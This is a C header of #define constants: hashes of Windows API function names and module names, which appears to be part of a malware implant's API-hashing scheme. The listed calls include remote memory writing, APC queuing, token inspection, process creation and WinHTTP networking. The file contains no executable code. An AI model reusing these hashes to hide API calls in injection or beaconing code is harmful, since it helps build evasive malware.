#ifndef DEFINES_H
#define DEFINES_H

#define APIhashval 4235

#define H_FUNC_GETTOKENINFORMATION                       0x28cfdef2
#define H_FUNC_GETUSERNAMEA                              0xad30f2cc
#define H_FUNC_LOOKUPPRIVILEGEDISPLAYNAMEA               0xc283fe04
#define H_FUNC_LOOKUPPRIVILEGENAMEA                      0xb021206e
#define H_FUNC_OPENPROCESSTOKEN                          0x7697ae7d
#define H_FUNC_GETADAPTERSINFO                           0x91df490b
#define H_FUNC_CLOSEHANDLE                               0xdc4924ad
#define H_FUNC_CREATEFILEA                               0x470d1cc0
#define H_FUNC_CREATEPIPE                                0x959184ed
#define H_FUNC_CREATEPROCESSA                            0x0dee3ebf
#define H_FUNC_DELETECRITICALSECTION                     0x8d69047e
#define H_FUNC_ENTERCRITICALSECTION                      0x286373a9
#define H_FUNC_EXITPROCESS                               0xafe41244
#define H_FUNC_FILETIMETOLOCALFILETIME                   0x28656c97
#define H_FUNC_FILETIMETOSYSTEMTIME                      0xa5eb1731
#define H_FUNC_FINDCLOSE                                 0x2b603682
#define H_FUNC_FINDFIRSTFILEA                            0x08b9df95
#define H_FUNC_FINDNEXTFILEA                             0xf8a4686c
#define H_FUNC_GETCOMPUTERNAMEXA                         0x3ac49d59
#define H_FUNC_GETCURRENTDIRECTORYA                      0x693b4464
#define H_FUNC_GETCURRENTPROCESS                         0x6fed97ad
#define H_FUNC_GETCURRENTPROCESSID                       0x21b2409a
#define H_FUNC_GETFILESIZE                               0x5a1133e6
#define H_FUNC_GETFULLPATHNAMEA                          0x43446c0d
#define H_FUNC_GETLASTERROR                              0x31f03249
#define H_FUNC_GETMODULEFILENAMEA                        0x6eb3a8b3
#define H_FUNC_GETMODULEHANDLEA                          0x75ab295e
#define H_FUNC_GETPROCADDRESS                            0xf10e6fc5
#define H_FUNC_GETSTARTUPINFOA                           0x0c0732ab
#define H_FUNC_GETTICKCOUNT                              0x531a5e1f
#define H_FUNC_INITIALIZECRITICALSECTION                 0xac38673d
#define H_FUNC_ISDBCSLEADBYTEEX                          0xae59182a
#define H_FUNC_LEAVECRITICALSECTION                      0xfbe8ad38
#define H_FUNC_LOCALALLOC                                0x7103d661
#define H_FUNC_LOCALFREE                                 0x1ab560d8
#define H_FUNC_LOCALREALLOC                              0xccd45d18
#define H_FUNC_MULTIBYTETOWIDECHAR                       0xbc635694
#define H_FUNC_PEEKNAMEDPIPE                             0x97af33a3
#define H_FUNC_QUEUEUSERAPC                              0x95a50063
#define H_FUNC_READFILE                                  0x0fbf71e7
#define H_FUNC_RESUMETHREAD                              0x3e5755b4
#define H_FUNC_SETCURRENTDIRECTORYA                      0xfb1170f0
#define H_FUNC_SETHANDLEINFORMATION                      0xd77c8269
#define H_FUNC_SETUNHANDLEDEXCEPTIONFILTER               0xf41f8f3f
#define H_FUNC_SLEEP                                     0x9ccfecc4
#define H_FUNC_TERMINATEPROCESS                          0x9063c133
#define H_FUNC_TLSGETVALUE                               0x93bfe3db
#define H_FUNC_VIRTUALALLOCEX                            0x69b46b5a
#define H_FUNC_VIRTUALPROTECT                            0xfa95fe13
#define H_FUNC_VIRTUALPROTECTEX                          0xf80dd810
#define H_FUNC_VIRTUALQUERY                              0xbb319108
#define H_FUNC_WAITFORSINGLEOBJECT                       0x268c15a0
#define H_FUNC_WIDECHARTOMULTIBYTE                       0xf24139d4
#define H_FUNC_WRITEFILE                                 0xda845a16
#define H_FUNC_WRITEPROCESSMEMORY                        0x05e54bee
#define H_FUNC_WINHTTPADDREQUESTHEADERS                  0x3ddd1e67
#define H_FUNC_WINHTTPCLOSEHANDLE                        0xf587a01b
#define H_FUNC_WINHTTPCONNECT                            0x941f7623
#define H_FUNC_WINHTTPOPEN                               0x3fcea8ab
#define H_FUNC_WINHTTPOPENREQUEST                        0xfebfd114
#define H_FUNC_WINHTTPREADDATA                           0xcf1aba4f
#define H_FUNC_WINHTTPRECEIVERESPONSE                    0x6e2c6eeb
#define H_FUNC_WINHTTPSENDREQUEST                        0xc58c11ec
#define H_FUNC_WINHTTPSETOPTION                          0xf80d1afe

#define H_MODULE_ADVAPI32                                0x569ac42c
#define H_MODULE_IPHLPAPI                                0xd1931034
#define H_MODULE_KERNEL32                                0x70512336
#define H_MODULE_NTDLL                                   0x6fe2b259
#define H_MODULE_WINHTTP                                 0xabe6f502

#endif // DEFINES_H
